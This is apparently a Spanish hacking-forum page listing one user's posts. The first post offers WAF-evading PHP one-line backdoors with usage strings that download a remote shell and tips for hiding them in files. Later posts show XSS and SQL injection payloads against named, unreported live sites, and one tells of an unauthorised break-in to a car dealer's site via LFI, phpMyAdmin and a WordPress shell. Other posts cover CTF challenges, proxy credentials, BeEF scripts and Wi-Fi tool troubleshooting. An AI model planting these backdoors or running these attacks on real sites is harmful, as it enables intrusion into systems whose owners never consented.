Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Nobody

#1
¡Hola a todos! ¿Cómo les va?

Estoy al tanto de la creciente necesidad de backdoors fáciles de camuflar y con capacidades para evadir Web Application Firewalls —WAF, de ahora en más—. Por lo cual, mediante esta publicación, les ofrezco una lista de backdoors de tan solo una línea, capaces de evadir WAF.

Advertencia: En esta lista no incluiré funciones obsoletas a partir de PHP 7.2.
Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

1. copy() - Requiere: allow_url_fopen. (nunca antes la vi, se me ocurrió recientemente)
Código: php
<?php copy($_GET['s'], $_GET['d']);

Citar
¿CÓMO UTILIZAR?
file.php?s=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2. include() - Requiere: allow_url_fopen.
Código: php
<?php include($_GET['x']);

Citar
¿CÓMO UTILIZAR?
file.php?x=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Advertencia: Obtuve mejores resultados utilizando un servidor HTTP sin PHP, por ejemplo, en Python.

3. popen() - DETECTADA POR No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
Código: php
<?php echo fread(popen($_GET['c'],'r'),1024*4);

Citar
¿CÓMO UTILIZAR?
file.php?c=wget -O shell.php No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Advertencia: Aún siendo detectada, es mi favorita y funciona excelente.

4. file_put_contents()
Código: php
<?php file_put_contents('_c.php','<?php '.$_GET['c'].' ?>'); include '_c.php'; unlink("_c.php");

Citar
¿CÓMO UTILIZAR?
file.php?c=system('wget -O shell.php No tienes permitido ver los links. Registrarse o Entrar a mi cuenta');
Advertencia: unlink() es opcional, pues yo lo uso para no dejar un archivo con el código ejecutado.

SUGERENCIAS
Citar
1. Se puede anteponer @ en alguna función, para así evitar imprimir los errores de la misma. Esto es útil a la hora de esconder el backdoor dentro de un archivo.
2. Se puede reemplazar $_GET por $_REQUEST, así aceptando GET, POST y COOKIE como métodos de entrada.
3. Se puede utilizar isset() y __halt_compiler() para obtener una salida más limpia a la hora de esconder el backdoor dentro de un archivo.
Citar<?php if(isset($_GET['c']))echo fread(popen($_GET['c'],'r'),1024*4); __halt_compiler();
4. El tag de cierre de PHP no es necesario en un archivo que solo contenga código. Así mismo, se puede utilizar short tags, si éstos están habilitados.

Pues nada más... En realidad, es un post sencillito, pero seguramente a alguien le será útil  :)

Salutes,
Nobody.
#2
Wargames y retos / Reto XSS #2 [Fácil/medio]
Mayo 01, 2018, 02:03:45 PM
¡Hola nuevamente!

Continuando con los wargames sobre XSS, aquí va el segundo reto XSS, con un nivel que oscila entre fácil y medio.

Historia
El administrador de sistemas se dio cuenta del error que había cometido filtrando XSS en el código anterior, así que decidió intentar corregirlo por si mismo, en vez de llamar a un experto. Después de leer cientos de tutoriales de PHP, logró editar el filtro anti XSS.

URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Soy curioso! ¿Podrían enviarme un MP con los payloads que hayan utilizado?

Spoiler (pequeña ayuda): (En mi payload uso cookies para completar el reto, tal vez podrías hacer lo mismo ;)).
#3
Wargames y retos / Reto XSS #1 [Fácil]
Abril 08, 2018, 06:20:17 PM
¡Hola a todos!
Hace mucho que no me pasaba por acá, ¿cómo están?

Sencillamente, hablando sobre CTF con un colega que pertenece a éste foro, se me ocurrió hacer un reto sencillito de XSS...
Bueno, en realidad él me pidió si podía hacer un reto CTF y no sé porqué terminé haciendo esto.

No doy más vueltas.
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¡Eh! Estoy probando ese hosting gratuito (qué va, tenía que subirlo a algún lado), así que no me sorprendería que en un par de días lo cierren. Si ésto sucede, lo volveré a subir.

Por si las moscas, cuando un par de personas lo resuelvan, publicaré el sencillo código.

EDITO:
Aquí va el código fuente de este sencillo reto, para los que ya lo resolvieron o tienen problemas para hacerlo.
Por favor, no veas el código antes de intentar resolver el reto, perdería la gracia totalmente.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
#4
Diseño UX/UI / Un pequeño wallpaper.
Enero 30, 2018, 04:35:09 PM
¡Hola gente!, ¿cómo están?

Hace tiempo que no me pasaba por estos lados, ha cambiado todo, parece.
En fin, estaba haciendo un pequeño wallpaper de Underc0de y me pareció una excelente idea compartirlo con ustedes.


(5000x2813 px)
Enlace directo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Acepto opiniones y criticas  ;D ;D

¡Nos vemos!
#5
Off Topic / ¿LFI? También un auto gratis.
Febrero 17, 2017, 03:54:09 AM
No es costumbre mía publicar historias, pero hoy salió mi Chema Alonso del interior y me decidí por publicar una.

Para darle apertura, creo que lo más correcto sería ponerlos en situación, así poder entender la historia en su totalidad.
Todo comenzó utilizando nuestro confiable Google, y si se pronuncia esa palabra en un foro de seguridad informática podríamos decir que casi siempre se refiere a Google Dorking. ¿Quién no ha utilizado Google para conseguir una página web vulnerable en forma de PoC? Espero sacarme algo responsabilidad diciendo eso.

Continuando con la historia, mi meta era lograr subir una shell a una página web tan solo aprovechándome de la vulnerabilidad No tienes permitido ver los links. Registrarse o Entrar a mi cuenta —de ahora en más, LFI—.
Posiblemente alguno ahora esté pensando en que esta publicación no tendría sentido, si todos conocemos de que trata LFI y sabemos implementarlo, ¿qué sentido tendría relatar una historia sobre un proceso que posiblemente conozcamos? La respuesta es relativamente simple. Mi intención no era obtener nada de esto —aunque un auto gratis no estaría mal—, simplemente hacer un promedio de cuantas páginas realmente son afectadas por este tipo de vulnerabilidad.

Para el que se lo esté preguntando, la página es de un concesionario de vehículos, algo tan simple con acceder a la base de datos y cambiar los precios de los vehículos, ¿no? —aunque todos sepamos que el precio que aparece nunca es el precio que usan—.

Una vez encontrada la página perfecta para intentar lograr mi cometido, era cuestión de aprovechar el LFI y un poco de Path Traversal para obtener información. Como no se trataba de algún CMS conocido, mi primera reacción fue intentar obtener el contenido del archivo index, para darme una idea de lo que tenía en frente.
Podría decir —y sin la necesidad de mostrarlo con una foto— que ese archivo aportó información valiosa y tal vez engañosa. Lo primero que noté fue una ruta hacia un archivo llamado "conn.php" dentro de la carpeta "Connections", creo que es evidente lo que tenía frente a mis ojos.



Llegada la inmediata necesidad de descargar ese archivo y al fin poder visualizar la información SQL completa, no dude en verificar el host, rezando que sea remoto y así poder hacer una conexión por consola desde mi PC, aunque no podía tener tan buena suerte. Mi último grano de esperanza era que la página contara con algún servicio de administración de base de datos —llámese phpMyAdmin—, y así fue.

Estando ya conectado, pude ver dos bases de datos. Revisando en orden, la primera se trataba de una base de datos completamente personalizada, es decir, no se trataba de ningún CMS o algo similar. Si, contenía tablas que hacían referencia a administradores y usuarios. Ese era el momento, conseguir el panel administrativo, subir shell y dar por terminado mi trabajo; Nuevamente, nada es tan fácil. Teniendo un archivo robots.txt vacío, lo mejor que me quedaba era probar nombres de directorios frecuentes, aunque nuevamente mi suerte era poca.

Pasado ya una unos minutos —muy largos—, podría decir que mi trabajo se había frustrado y lo mejor era abandonar, si... estando tan cerca, pero abandonar no era una opción. En ese momento un rayo de sol me iluminó —en una noche oscura, luego de una lluvia intensa—. ¡Eureka! Recordé que aún había otra base de datos por revisar, y para mi suerte era nada más y nada menos que una base de datos WordPress. Teniendo la posibilidad de editar la contraseña del administrador, loguearme y subir shell desde el propio panel administrativo de WordPress, creo que era un pecado no tentarse.



¡STOP! Los problemas seguían, todavía faltaba encontrar la ruta del blog, aunque no debería ser muy difícil, ¿no?
Si, imagínense, en la página no había ningún enlace que apuntase hacia una aparente instalación de WordPress. Esto ya me estaba frustrando, recuerdo haber bajado el archivo ".htaccess", sin resultados sobre una dirección del blog —y si, tampoco me falto ganas de mirar si existía un directorio admin—. En ese momento recordé que en otra pestaña tenía a mi amigo Google esperandome, un dork sencillito debería revelar la instalación de WordPress.

Sin más esperas, recurrí a un dork tan sencillo que ni merece la pena mencionar, aunque de no hacerlo, la historia no estaría completa.



¡Eso es, la instalación... pero no! Al parecer hoy el mundo estaba en contra mío, esa instalación no estaba correctamente configurada y por ende no servía.
Sin perder muchas esperanzas, supuse que si Google ayudó una vez, tal vez pueda ayudar otra. Sacando del cajón de antigüedades otro dork, no dude ni por un segundo en probarlo, sabiendo muy dentro mío que si no resultaba mis posibilidades de lograr mi meta eran casi nulas.



Con los dedos cruzados, entré al tercer resultado, todo apuntaba a que era realmente una instalación de WordPress, y para mi suerte lo era.
En ese momento se me cruzó por la cabeza el pensamiento oscuro de "es el fin, lo logré", cuando ni había comenzado. En una pestaña, el panel de ingreso administrativo, en otra, phpMyAdmin. Solo era cuestión de segundos, anotarse la contraseña real en un bloc de notas, modificarla por la que más me gustase y listo, obtenía acceso completo.



Para no aburrir a nadie más, voy a simplemente obviar la explicación de como subir una shell mediante el panel administrativo de WordPress, esa información se obtiene en cuestión de segundos con un buscador —el buscador de Underc0de no está nada mal, hee hee!—.

Ya con la shell en el servidor y el servidor en mi poder, era solo cuestión de un par de clics para arruinar completamente la concesionaria y alojar contenido ilegal, posteriormente claro, hacer una denuncia. Para suerte de ellos —y posiblemente también mía—, no estaba en mis planes del 2017 ser maligno, así que simplemente me limité a intentar reportar mis descubrimientos al administrador del sitio. Reportar un error a un administrador no es de mis tareas favoritas, ya que la mayoría nunca responden, y los que responden lo hacen diciendo "gracias, lo solucionaremos a la brevedad" o te acusan de infringir la ley —en realidad tienen razón— y, por si fuera poco, decirte que tu intensión era causar el mal.

Tragándome mis sentimientos y experiencias pasadas, recordé que ese blog tenía un sistema de chat para ventas. Un representante podía perfectamente decirme con quien debía hablar para reportar este tipo de errores —ignorando completamente el correo que figura en whois y el correo de la cuenta administrador del blog—.

Para mi mala suerte —o tal vez buena suerte—, lo que pasó fue lo siguiente:



Era de esperarse, ¿a quién se le ocurre reportar una vulnerabilidad a horarios de la madrugada? Aunque mi conciencia está limpia, tuve el interés en reportar.
En algún futuro cercano posiblemente reporte el error, aunque de seguro no les importará y siga todo igual.

Saludos,
Nobody.
#6
Hacking ShowOff / [XSS] Estafadores de Pokémon GO.
Agosto 11, 2016, 10:32:38 PM
¡Hola!

Como era de esperarse, las estafas de suscripciones a SMS "premium" ya llegaron para Pokémon Go. En este caso, una página web que "promete" monedas y pokébolas para el famoso juego.

- Imagen:
Citar

- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Vector utilizado: <script>alert(Nobody)</script>.
- Método: POST (X00InputUsername).
- Reportado: NO.

- WHOIS:
CitarDomain Name: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Registry Domain ID: 2027350117_DOMAIN_COM-VRSN
Registrar WHOIS Server: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Registrar URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Update Date: 2016-05-11T01:32:56Z
Creation Date: 2016-05-11T01:32:56Z
Registrar Registration Expiration Date: 2017-05-11T01:32:56Z
Registrar: Wild West Domains, LLC
Registrar IANA ID: 440
Registrar Abuse Contact Email: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Registrar Abuse Contact Phone: +1.4806242505
Reseller: DomainRightNow
Domain Status: clientTransferProhibited No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Domain Status: clientUpdateProhibited No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Domain Status: clientRenewProhibited No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Domain Status: clientDeleteProhibited No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Registry Registrant ID: Not Available From Registry
Registrant Name: Gerson Dominguez Matos
Registrant Organization:
Registrant Street: Mz Y, Lote 12, Urbanizacion Alamo
Registrant Street: Callao
Registrant City: Callao
Registrant State/Province: Callao
Registrant Postal Code: 01
Registrant Country: PE
Registrant Phone: +51.51942191706
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Registry Admin ID: Not Available From Registry
Admin Name: Gerson Dominguez Matos
Admin Organization:
Admin Street: Mz Y, Lote 12, Urbanizacion Alamo
Admin Street: Callao
Admin City: Callao
Admin State/Province: Callao
Admin Postal Code: 01
Admin Country: PE
Admin Phone: +51.51942191706
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Registry Tech ID: Not Available From Registry
Tech Name: Gerson Dominguez Matos
Tech Organization:
Tech Street: Mz Y, Lote 12, Urbanizacion Alamo
Tech Street: Callao
Tech City: Callao
Tech State/Province: Callao
Tech Postal Code: 01
Tech Country: PE
Tech Phone: +51.51942191706
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Name Server: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Name Server: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
>>> Last update of WHOIS database: 2016-08-12T01:00:00Z <<<

For more information on Whois status codes, please visit No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

The data contained in this Registrar's Whois database,
while believed by the registrar to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This information
is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of
this data for any other purpose is expressly forbidden without
the prior written permission of this registrar.  By submitting an
inquiry, you agree to these terms of usage and limitations of warranty.
In particular, you agree not to use this data to allow, enable, or
otherwise make possible, dissemination or collection of this data, in
part or in its entirety, for any purpose, such as the transmission of
unsolicited advertising and solicitations of any kind, including spam.
You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data
for any purpose, including mining this data for your own personal or
commercial purposes.

Please note: the owner of the domain name is specified in the "registrant" section.
In most cases, the Registrar is not the owner of domain names listed in this database.

¡Saludos!
#7


I. ¿Qué son los controladores?

CitarUn controlador de dispositivo o manejador de dispositivo (en inglés: device driver, o simplemente driver) es un programa informático que permite al sistema operativo interaccionar con un periférico, haciendo una abstracción del hardware y proporcionando una interfaz (posiblemente estandarizada) para utilizar el dispositivo.
Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Wikipedia).

En resumen, son "programas" que permiten al software comunicarse con el hardware y que este realice una tarea específica.
Para hacerlo más sencillo, es lo que necesitamos para que nuestra GeForce nos haga caso cuando queremos jugar Battlefield (y que cuando no nos hace caso nos ponemos violentos).




II. ¿Es importante mantenerlos actualizados?

La respuesta es si. Es importante mantener estos actualizados para prevenir problemas de seguridad, que puedan permitirle a un tercero tomar control sobre el equipo o causar daño físico.

Si bien es una forma de evitar estos problemas, también es importante destacar que contando con la última versión de los controladores se puede evitar posibles problemas de compatibilidad o errores encontrados en versiones anteriores.

Referencias:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta






III. ¿Cómo puedo actualizar mis controladores?

La forma más eficaz es utilizando alguna herramienta oficial del proveedor de dichos controladores, o bien descargándolos de forma manual desde la página web del proveedor.

Otra alternativa son los programas de terceros que prometen al usuario descargar de forma automática todos los controladores desactualizados del equipo.

         




IV. El fin.

Una vez teniendo todos los controladores en su última versión, ¡es el fin! Ya es hora de continuar usando el equipo con total tranquilidad, o jugar Battlefield en gráficos "ULTRA" y matar a esos enemigos que se burlaban de vos.






Visita los #UNDERtips en:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#8
¡Hola!

La idea fundamental de este post es la oportunidad de aprovechar algo que considero "bueno" con respecto a un VPN que, aunque tenga mala fama, sirve en muchas ocasiones.



I. ¿Me van a robar la contraseña de 'Feisbu'?
Existe mucha información con respecto a este tema. Dejo que saquen sus propias conclusiones.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aunque, suponiendo que se usaría el VPN de forma temporal —te registrás en esa página ilegal que tanto te gusta— y luego seguís con tu vida diaria, no creo que suponga ningún riesgo (sin mencionar que evitamos instalar el cliente).



II. La idea primero
Polsaker me dio la idea —involuntariamente— después de ver su post (vamos, Netflix con una IP de Rusia anda de diez).
Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



III. Comencemos...
Para comenzar necesitamos saber de que región queremos obtener una dirección IP. Hay regiones limitadas, las cuales se listan a continuación:

Citarar, au, at, be, bo, br, cl, fi, fr, de, gi, gb, gr, hk, is, in, it, jp, kr, kw, mx, nl, nz, py, pe, pt, ro, ru, sh, es, se, ch, tw, uk, uy, us, ve, no
Referencia: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este caso usaré Italia (it) como ejemplo.


Leyenda: Región seleccionadaHost y puertoIP correspondiente al hostContraseña.

Para ello ingresaremos a la siguiente dirección:
CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
reemplazando "XXX" por el código de región seleccionado (it, en este caso).

CitarNota: La siguiente dirección también es válida.
CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta



IV. Configuración


En este paso lo único que tendremos que hacer es ir a la configuración de red de nuestro navegador preferido y configurar los datos que conseguimos anteriormente: host y puerto.



V. Autentificación
Esta es la parte por lo que el código de Polsaker "no funcione". Al intentar navegar en Internet, nos pedirá una autentificación, la cual se deja a continuación:

CitarUsuario: user-uuid-12391d63676f806ff6c124adf38aced2
Contraseña: 2e6425649256
—————————————————————————————————————————————————————
Nota: La contraseña es la conseguida previamente. Aunque ésta parece ser estática.



VI. Comprobación

Leyenda: Región seleccionadaIP correspondiente al host.

El paso final —pero no menos importante— es verificar que nuestra dirección IP haya cambiado.



VII. El fin...
Quiero disculparme por la forma de redacción del post. Sinceramente estoy oxidado en la forma de publicar  ::) ::) ::)
También quiero disculparme por no usar lenguaje técnico del área, intenté orientar el post a gente que tal vez no tenga en claro estos términos  :P :P :P



VIII. Agradecimientos
Agradezco especialmente a S@nde por motivarme a hacer el post, a blackdrake por el apoyo en revisión del contenido y a Polsaker por la idea del post. ¡Gracias!
#9
Hacking ShowOff / [SQLi] www.elimportador.com.ar
Junio 11, 2016, 11:22:32 AM
¡Hola!

Un amigo me preguntó si una web llamada "El Importador" era confiable para importar articulos, abajo está mi respuesta...  :P

- Imagen:
Citar

- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Payload: -45 union select 1,2,3,4,version(),6,7 -- (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Reportado: NO.

¡Saludos!
#10
Hacking ShowOff / [XSS] comoseescribe.org
Mayo 17, 2016, 09:31:05 PM
¡Buenas!

Tenía la necesidad de saber como se escribía un número grande en letras. Una vez resuelta mi duda, pensé que sería buena idea buscarle algunas fallas para entretenerme un rato :P.

- Imagen:
Citar

- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Vector utilizado: <script>alert(document.domain)</script> (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Sectores vulnerables: URL.
- Reportado: NO.

¡Saludos!
#11
Hacking ShowOff / [XSS] rebelion.org
Abril 22, 2016, 09:38:08 PM
¡Buenas!

Estaba en geografía en el colegio, cuando el profesor mencionó que el material lo sacó de una página web (y nos mencionó cual); Automáticamente saltaron mis alarmas al ver el buscador y como ya había terminado la tarea, me propuse a hacer un XSS.

- Imagen:
Citar

- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Vector utilizado: <script>alert(0)</script> (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Sectores vulnerables: Buscador.
- Reportado: NO.

Posiblemente tenga otros fallos (como SQLi), el que quiera - y tenga tiempo - es libre de investigar :P

¡Saludos!
#12
Off Topic / [Off] Critica a Windows 8!
Febrero 24, 2016, 12:25:37 PM


Advertencia: Usted puede morir por risa excesiva.

No conozco a ese tal "July3p", pero el compañero que me pasó el vídeo dice que es uno de sus personajes (que desde ahora voy a llamar "pendulo humano" xD).

Saludos!
#13
Batch - Bash / [Bash] BeEF Fix.
Febrero 20, 2016, 05:06:42 PM
¡Hola Underc0ders!

Estaba intentando trabajar con BeEF, cuando recuerdo el molesto error que tiene sobre Kali, que al iniciarlo no aparece el admin ui y demás.

Según Offensive Security, este error fue parcheado en Kali Rolling, lo cual es una total mentira porque estoy trabajando (de hecho, publicando esto) desde Kali Rolling.

Tal vez sea un error que solo me afecta a mi o tal vez no, pero nunca está de más publicar un "parche" (y entre muuuuchas comillas, "parche") para solucionar esto.

Código: bash
#!/bin/sh
service beef-xss stop
sleep 1
echo '[*] Executing BeEF Framework...'
sleep 1
echo '[ INFO ] Default user/passwd: beef : beef'
echo "[ INFO ] If an error ocurrs, try using ' service beef-xss start ' in other console AFTER BeEF Framework loads."
cd /usr/share/beef-xss/
ruby beef


De más estar decir sobre ' chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta '...

Y para los vagos como yo, se puede solucionar editar el script que viene por defecto en Kali (/usr/bin/beef-xss/)

Código: bash
#!/bin/bash

if [[ $EUID -ne 0 ]]; then
   echo "[*] This script must be run as root" 1>&2
   exit 1
fi

port=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['http']['port']")
ui=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['http']['web_ui_basepath']")
hook_file=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['http']['hook_file']")
#user=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['credentials']['user']")
#passwd=$(ruby -ryaml -e "print YAML.load_file('/etc/beef-xss/config.yaml')['beef']['credentials']['passwd']")

service beef-xss stop
echo '[*] Please wait as BeEF services are started.'
echo '[*] You might need to refresh your browser once it opens.'
echo "[*] UI URL: http://127.0.0.1:$port$ui/panel"
echo "[*] Hook: <script src=\"http://<IP>:$port$hook_file\"></script>"
echo "[*] Example: <script src=\"http://127.0.0.1:$port$hook_file\"></script>"
#echo "[*] Username: $user | Password: $passwd" #echo "[*] Default user/pass: beef : beef"
echo ''; echo "If an error ocurrs, try using 'service beef-xss start' AFTER BeEF loads."
echo "[*] To kill BeEF you can use 'killall ruby && service beef-xss stop' in console."; echo ''

cd /usr/share/beef-xss/
ruby beef #nohup ./beef >& /dev/null &


O simplemente ejecutando esta linea en consola...
Código: php
mv /usr/bin/beef-xss /usr/bin/beef-xss.bak && wget -O /usr/bin/beef-xss https://nobodytl.github.io/codes/bash/beef-xss && chmod +x /usr/bin/beef-xss


Espero que les sirva, ¡saludos!

P.D.: Gracias a @arthusu, que me sugirió que lo publicara :P
#14
¡Buenas!

Sigue mi busqueda por una GTX, encontré una nueva página web que no me trae buena pinta (pero no soy nadie para juzgar), de todas formas aproveché mi ratito libre y me divertí un rato jaja.

(P.D.: Disculpen el tamaño de la imagen, esta la tomé desde mi notebook).
- Imagen:
Citar

- URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Vector utilizado: <script>prompt("Underc0de.org", "By Nobody");</script>
- Sectores vulnerables: Buscador.
- Reportado: NO.

¡Saludos!
#15
Hacking ShowOff / [XSS] www.aikencomputacion.com.ar
Febrero 02, 2016, 07:43:08 PM
¡Hola, muy buenas!

Estaba buscando para comprarme una GeForce nueva, cuando me topé con mi viejo amigo Aiken Computación (Argentina :P), y como todo amante de la informática y vulnerabilidades a nivel web, sentí la obligación de probar un XSS en una variable GET (jaja).

Tuve la idea de incluir un script JavaScript externo para no líarme bypasseando el addslashes de la web.

(P.D.: Es una "fullscreen" iframe).
[*] Imagen:
Citar

[*] URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
[*] Vector utilizado: <script src=No tienes permitido ver los links. Registrarse o Entrar a mi cuenta></script>
[*] Variables vulnerables: Todos los GET de la web.
[*] Reportado: SI (no reparado).

En definitiva, el vector final sería: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El código del JavaScript lo dejo aquí debajo (aunque también es visible desde el link del vector) para demostrar como funciona.

Código: php
document.body.innerHTML = "<iframe style='position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;' src=http://www.underc0de.org/></iframe>";
alert("Underc0de.org");


¡Saludos!
#16
Buenas a todos,

estuve probando la nueva versión de Kali Linux y la verdad me fascina la nueva interfaz, estuve jugando un poco con las opciones y llegué al clásico aircrack, nunca tuve problemas con él, salvo ahora...

Según me enteré, desde ahora la interfaz pasaría a de llamarse "monX" (por ejemplo, mon0) a "wlanXmon" (por ejemplo, wlan0mon), creándose así una nueva interfaz en modo monitor con dicho nombre. Hasta ahí todo bien, resulta que luego de esto, la interfaz automáticamente cambia de nombre a "wlanXmon" (y como consecuencia el argumento "stop" de airodump deja de funcionar), además de eso, funciones básicas como "airodump-ng wlanXmon" dejan de funciona, debido a que la interfaz "no está en modo monitor" (y lo más raro es que en algunos casos me funciona dicho comando sin siquiera haber puesto en modo monitor la interfaz).

Aquí un "historial":
Citarroot@ kali:~# airodump-ng wlan0 --wps
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.

root@ kali:~# airmon-ng check
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
1234 NetworkManager
1341 wpa_supplicant
1576 avahi-daemon
1577 avahi-daemon
2112 dhclient

root@ kali:~# airmon-ng
PHY   Interface   Driver      Chipset

phy0   wlan0      rtl8192ce   Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)

root@ kali:~# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
1234 NetworkManager
1341 wpa_supplicant
1576 avahi-daemon
1577 avahi-daemon
2112 dhclient

PHY   Interface   Driver      Chipset

phy0   wlan0      rtl8192ce   Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)
      (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
      (mac80211 station mode vif disabled for [phy0]wlan0)


root@ kali:~# airmon-ng
PHY   Interface   Driver      Chipset

phy0   wlan0mon   rtl8192ce   Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01)

root@ kali:~# airodump-ng wlan0mon --wps
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0mon <#>'
Sysfs injection support was not found either.

root@ kali:~#

Edit: Al parecer, cerrando el proceso "NetworkManager" puedo usar comandos como por ejemplo airodump aún sin poner la interfaz en modo monitor. El problema es que al cerrar dicho proceso me es imposible conectarme a una red WiFi.

Hice la prueba con un adaptador WiFi USB y el problema persiste.

(P.D.: Otro problema que tengo es que al iniciarlo, después de un tiempo se suspende automáticamente, solamente me sucede con mi notebook (quiero aclarar que el problema con aircrack también es con la notebook, dado a que es el único equipo que tengo con WiFi. Si alguno sabe algo se agradecería la respuesta jeje :P).

¿A alguien más le sucede? ¿Alguna solución?

Gracias,
Nobody.